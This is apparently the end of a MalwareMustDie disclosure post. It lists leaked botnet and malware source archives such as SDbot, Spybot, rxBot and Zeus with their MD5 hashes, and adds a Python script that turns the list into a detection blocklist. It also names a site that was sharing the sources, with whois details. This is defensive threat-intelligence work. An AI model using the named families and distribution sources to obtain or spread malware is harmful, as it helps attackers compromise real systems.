2009/06/12  19:42 5aa288d2a1692673803d723ad59706e0      65,533 rx_dev+service+working_lsass+sasser+ftpd.rar
2009/06/12  19:42 9273d451ebdd01b9380efea5ea42948c     474,597 rx_dev_service_working_lsass_sasser_ftpd.rar
2009/06/12  19:43 5e3fd5677376500c00484d16f473bda5     217,685 rX_lsdigital_Mod_priv.rar
2009/06/12  19:43 0e739e4b87c4ff60888d31c4baef1684     258,739 Rx_Temptation.rar
2009/06/12  19:45 d74793f5072ad764f4428f6652fb3801       7,863 s5.rar
2009/06/12  19:49 798b16d4018b74a74555938deb06d619   1,858,529 Sbot-RARSpreader.rar
2009/06/12  19:45 7f480ebe0a8bd58ef49ad6579b1986e9      64,994 SBX.amk.0x00.rar
2009/06/12  19:45 b47655beb2153f8f9d8f906786b6461e     142,660 screens.zip
2009/06/12  19:45 2117589061d5ae386e68ac140b425106      89,489 sd with fake xdcc by Synco.zip
2009/06/12  19:46 5bbcbe76a73c8e7a0392c0e41867f5a3     100,167 sdbot i3s.rar
2009/06/12  19:47 7061b41082cf46b051c0f68a735065de      50,889 sdbot-ntpass-codefix-nils-22.10.03.rar
2009/06/12  19:46 a0bab8e230cc6f2bfa963dfb84416a3a      28,930 SDbot05b-getadm.rar
2009/06/12  19:46 b16e8a33e54e5fdcf721b1653b1afe81      57,481 sdbot05b_skbot__mods_by_sketch.rar
2009/06/12  19:46 99ab1f471ec8ea0ec12a0eff605af2d9     390,300 Sdbot_Hardcore_Mod_By_StOner.zip
2009/06/12  19:46 7e027233923c53a9d33c087e6e698dff      92,181 SDBot_with_NB spreader.rar
2009/06/12  19:47 6a9abbe9db6d919e30f42fc40484c5be      51,312 SDX.amk.0x00.rar
2009/06/12  19:46 06b17aecd7f744a502f0789f88c1e4c3     402,522 sd_bot_all.zip
2009/06/12  19:47 f26b2deb2d9fc65ad74554737df53d36   3,022,716 shadowbot-m3.rar
2009/06/12  19:47 dc626ec6e103da5aa5e34c9209b93096     116,185 shadowbot.rar
2009/06/12  19:47 227204fd6958067d53765b5145641904      86,441 shadowbotv3.rar
2009/06/12  19:47 1d5a6cd11731d12dbf980f00924c3e5d     521,820 shellbotFTP.rar
2009/06/12  19:47 02c1edcbc84d3e1a173a377955c43bd6     677,164 sHk-Bot.svchost-ns-dev.NOT-FOR-RELEASE.rar
2009/06/12  19:47 d3ecb7e97103009399f03519160e1168     204,781 SkuZ-BoT-V.1-2006-.rar
2009/06/12  19:47 25f9f0c5e37a4579fcd213b330cfb692     289,319 SkuZ-Netapi-VNC-IM.rar
2009/06/12  19:47 8586b8374c955d84ac360507eb169ce5      15,518 Sky Bot_incomplete.rar
2009/06/12  19:47 6c3e198b78774f4ce202b849e1acea38      46,185 Skype_Spread(PoC).7z
2009/06/12  19:47 7062e27b7b355f396f41134f5c297587       9,806 Small.rar
2009/06/12  19:47 e5f228844bfeeddf2a2c2c6452a6f1ec      90,650 SpazBot.rar
2009/06/12  19:47 fee0531a4bb6baae558752a149828f07     333,754 SpyBot Leechbot_r1.5a_private.rar
2009/06/12  19:47 eb1e2e57a68f536f7592e985d40d6fdd      35,088 spybot1.2-FULl.rar
2009/06/12  19:47 2163ce34a63d2088dfe4af673f4f0261      95,696 spybot1.4.zip
2009/06/12  19:47 cce221fca66c9b9ed96605c9e4c57ff3      36,470 spybot_1.2c.zip
2009/06/12  19:47 80145a460f300a2a70faf397ed66ba2f      91,107 spybot_1.3m.zip
2009/06/12  19:48 c8fb061171652dbb2d518dca7dbe27e9      89,331 spybot_1.4.zip
2009/06/12  19:48 2b183360db6e212a3a6c2836f53137e2      53,537 STEAMBOT-src-2008.rar
2009/06/12  19:48 8dcdeb211ed5077d5dfd85168992ae5b     385,550 Stripped-RXV8.rar
2009/06/12  19:48 5b11513082401b1231e17a4a7777a0c3      22,071 svBot_.rar
2009/06/12  19:48 e7714da35836571a071e83e90115a572      24,742 svbot_activex.rar
2009/06/12  19:48 e05085b6362f3f9cbb9f281c7db08033     313,360 svmail.rar
2009/06/12  19:48 de29ce28b985c781b64357bfd7c4d5c9     180,780 SYM-VNC-NETAP__304_-ASN.rar
2009/06/12  19:48 12a4ccecca84db4909b477468c478594     291,529 TANKBOT 1.0.rar
2009/06/12  19:48 1f0f78be8fe1596680041495783ea08d      37,318 tgspy_nt.zip
2009/06/12  19:48 ad19cf692eb1dd180b12ad546e5e75c9   1,479,024 TsGh_Bot_v3.rar
2009/06/12  19:48 e3c6ead12b4ed521dd2bcfa127b489cf     250,381 uber-wks-asn-m0dded-Pr1v.rar
2009/06/12  19:48 28ccec60a3da99fcb2f3221167c13586      83,202 Unix bot 2.2.5.rar
2009/06/12  19:48 64409a5e2ca611ccc826947654923335     127,945 uNk + USB.zip
2009/06/12  19:48 bd2138b06d33df22e83ffda0bc210f71     203,100 URX-pnp-asn.rar
2009/06/12  19:48 eb14beaa111df581ff7b4a30e3b9fdfd     176,144 Urx.SYM+ASN.rar
2009/06/12  19:48 620bd3c7138c838140ad0cb9aaa760e9     253,664 Urxbot.pRiV-sKull.MoD-ASN_FTP_WORKING.rar
2009/06/12  19:48 a3d68eeff0dc4ee2c58a090c49464685      25,987 vbbot.zip
2009/06/12  19:48 a8f635399ab05d197237e5c6c452ba1b      49,639 vBot.rar
2009/06/12  19:49 164f47d80a5f4b2b103e633c9e69b32a     701,859 VNCscanner.rar
2009/06/12  19:48 89da2d3dbe384977dce0503c10ba5a39     250,208 VrX-5_Priv8_-Msn-Yahoo-TIM-EXPLS-DDOS-116kb.rar
2009/06/12  19:49 376ed869ca322723fabc967628c5769d   2,307,717 w32-netapi-rfi_whit_vnc_exploit.rar
2009/06/12  19:48 9b756f3da73492d2d8de4a48a49bc4cc      19,857 w32ogw0rm.rar
2009/06/12  19:48 9f4841fe9b342352cd3a25590539e8f3       2,355 WarSkype.rar
2009/06/12  19:48 b18e973b610e1838932e88bd53a7891d       8,404 wbot 0.2.rar
2009/06/12  19:48 b91d2846e9fb0d5a2ff50b942fdf48cf       7,426 Win32.Anthrax.rar
2009/06/12  19:49 31ee869f37d73652213352f4631af52e      11,143 Win32.Divinorum.rar
2009/06/12  19:49 1f951ab7c0fb0c5b85e069b1be4bb262       6,439 Win32.Fga.rar
2009/06/12  19:49 5fb72a96da34703e3acc1ee513f36552       8,487 Win32.FridaySectoriate.rar
2009/06/12  19:49 b3ff0098ce3eb257e0af4441541ecac4       7,781 Win32.Harulf.rar
2009/06/12  19:49 459b78d94185943b9ffb2cf108559d6a      42,327 Win32.Mimail.rar
2009/06/12  19:49 e5d1585c450930ca2400b73a915b3fda       3,421 Win32.MiniPig.rar
2009/06/12  19:49 8ff7fc0dc36db3e06be09f3ca560a838      12,875 Win32.Relock.rar
2009/06/12  19:49 8abeded32cc32bb29df9dda9c52ec398       3,172 Win32.Whore.rar
2009/06/12  19:49 502c68a0e3b0a25556a1b3c7dfc798cf      54,804 wisdom.zip
2009/06/12  19:49 a6a25a6801eeb505592dbcdd22701318   2,856,262 wisdom3.rar
2009/06/12  19:49 403b57447d83c96fb4bc17856cec80b2      56,133 wisdom_phr0st_modd.zip
2009/06/12  19:49 bcf4d44ec3550604560b179b481d47dd     151,716 Wiseg3ck0-AIM-DDOS-.rar
2009/06/12  19:50 f536b52db492b1fdb8e63835ccadc19a   1,337,728 woodworm2.rar
2009/06/12  19:49 a2c135f08c7d3dd9a10207c0b8afb9ba     233,121 X0R-USB-By-Virus.rar
2009/06/12  19:49 df8d52c0d08e277cc43c472dca2ed8cb      42,667 xerion2.5.rar
2009/06/12  19:49 7489acc9b17505f0074f103edb49e6ac       7,498 XfireSpread.rar
2009/06/12  19:49 4aa1b4f3f83e470d14b38d05d426fdb0      53,167 xTBot.0.0.2-priv.rar
2009/06/12  19:50 9cffdfa96d91e497b1d0f14fb055cdd5     473,901 ya.bot.rar
2009/06/12  19:50 866681ae3248b68aea0f1e1598386b5c   1,126,175 Zeus 1.1.0.0.rar
2009/06/12  19:50 75efc4a3c87ba1e7f8b743de36718132     358,075 zunker.rar
------------------------------------------------------------------------------------------------------------------
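The listing above is most useful to a defender once it is turned into a de-duplicated hash set, since the same archive appears several times under different names (for example dopebot0.22.rar and dopebot0.22.uncrippled.rar share one MD5). The following Python is an added example, not MalwareMustDie's own tooling: it parses the listing's DATESTAMP/TIME/MD5/SIZE/FILENAME layout, de-duplicates by MD5, flags names that share a hash and any hash listed with two different sizes (a transcription-error check), and looks a computed hash up against the set. The LISTING string is a constructed subset of rows copied from the table above.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample: a subset of the rows in the listing above, copied verbatim,
# including three pairs of entries that share one MD5.
LISTING = """\
DATESTAMP   TIME  MD5                              SIZE       FILENAME
------------------------------------------------------------------------------------------------------------------
2009/06/12  19:32 bc487a321f966901ccff083fdfb9d76d  1,159,465 dopebot0.22.rar
2009/06/12  19:32 bc487a321f966901ccff083fdfb9d76d  1,159,465 dopebot0.22.uncrippled.rar
2009/06/12  19:34 c216d6757a0a944881fa1038dc105a69     61,125 gtsev-spreader.rar
2009/06/12  19:34 c216d6757a0a944881fa1038dc105a69     61,125 gtsev-spreader_2_.rar
2009/06/12  19:35 3f7cf217ec499ba9d34e86e47cf08efe      8,643 kaiten.c.rar
2009/06/12  19:36 df8d52c0d08e277cc43c472dca2ed8cb     42,667 NtScan-rbot.rar
2009/06/12  19:49 df8d52c0d08e277cc43c472dca2ed8cb      42,667 xerion2.5.rar
2009/06/12  19:50 866681ae3248b68aea0f1e1598386b5c   1,126,175 Zeus 1.1.0.0.rar
------------------------------------------------------------------------------------------------------------------
"""

# One listing row: date, time, 32-hex MD5, comma-grouped size, then the file name
# (which may itself contain spaces, so it runs to the end of the line).
ROW_RE = re.compile(
    r"^(\d{4}/\d{2}/\d{2})\s+(\d{2}:\d{2})\s+([0-9a-fA-F]{32})\s+([\d,]+)\s+(.+?)\s*$"
)


def parse_listing(text):
    """Return a list of dict rows; header, rule and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # header, separator rule, or a line that does not fit the layout
        date, time, md5, size, name = m.groups()
        rows.append({
            "date": date,
            "time": time,
            "md5": md5.lower(),
            "size": int(size.replace(",", "")),
            "filename": name,
        })
    return rows


def unique_hashes(rows):
    """The de-duplicated MD5 set, which is what a blocklist actually needs."""
    return {r["md5"] for r in rows}


def duplicate_groups(rows):
    """MD5 -> file names, for hashes that appear under more than one name."""
    by_hash = defaultdict(list)
    for r in rows:
        by_hash[r["md5"]].append(r["filename"])
    return {h: names for h, names in by_hash.items() if len(names) > 1}


def inconsistent_sizes(rows):
    """MD5s listed with differing sizes: identical content cannot have two sizes,
    so any hit points at a transcription error in the listing."""
    sizes = defaultdict(set)
    for r in rows:
        sizes[r["md5"]].add(r["size"])
    return sorted(h for h, s in sizes.items() if len(s) > 1)


def md5_hex(data):
    """MD5 of a byte string (the algorithm the listing uses)."""
    return hashlib.md5(data).hexdigest()


def lookup(md5, rows):
    """File names the listing records for this MD5 (empty list if unknown)."""
    md5 = md5.lower()
    return [r["filename"] for r in rows if r["md5"] == md5]


def blocklist(rows):
    """Sorted one-hash-per-line text suitable for feeding a scanner or SIEM."""
    return "\n".join(sorted(unique_hashes(rows))) + "\n"


if __name__ == "__main__":
    rows = parse_listing(LISTING)
    print(f"{len(rows)} rows, {len(unique_hashes(rows))} unique MD5s")
    for h, names in duplicate_groups(rows).items():
        print(f"{h} appears as: {', '.join(names)}")
    print("size mismatches:", inconsistent_sizes(rows) or "none")
    print(blocklist(rows), end="")
```

Feeding the full table through parse_listing gives the hash set to match against files recovered from other shares; since the archives later seen on other sites were re-packed and partly backdoored, a hash that is absent from this set is exactly the case where the copy should not be trusted as original.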
Incomplete or unclear sample requests will be answered as follows (please state your identity clearly):

[Additional Tue Jun 4 00:40:22 JST 2013] After the finding of the torrent source described above, another of our members found similar source codes shared openly via HTTP on the site below, hosted in Sweden; we suspect the same owner, or an individual who grabbed the same torrent source we found before its deletion. Note: the torrent we found was up and alive for a while before we found it. There is no need for us to hide this information, so we expose it too, as below, for evidence and further legal investigation purposes:

database,th3-0utl4ws,com/index.php
contact: facebook.com/0uTl4wS
Date: Mon, 03 Jun 2013 15:36:49 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.2.17
With the domain details:
Domain Name: TH3-0UTL4WS.COM
   Registrar: INTERNET.BS CORP.
   Whois Server: whois.internet.bs
   Referral URL: http://www.internet.bs
   Name Server: NS1.TH3-0UTL4WS.COM
   Name Server: NS2.TH3-0UTL4WS.COM
   Status: clientTransferProhibited
   Updated Date: 02-may-2013
   Creation Date: 03-may-2009
   Expiration Date: 03-may-2014

Registrant:
    Fundacion Private Whois
    Domain Administrator
    Email:ialif564f82375a6bc36@t02cduv4f7f99a255f64.privatewhois.net
    Attn: th3-0utl4ws.com
    Aptds. 0850-00056
    Zona 15 Panama
    Panama
    Tel: +507.65995877
After the torrent data, we found similar shares of these evil codes popping up here and there on several blackhat sites too, with changes to the archives (now password-protected) and some additional malicious changes (mostly backdoors) in some of the source codes, which was one main reason we decided to start sharing this information properly with the AV companies, authorities and trusted researchers. We checked the source before sharing; its originality can be confirmed by the hashes listed above.

#MalwareMustDie, NPO.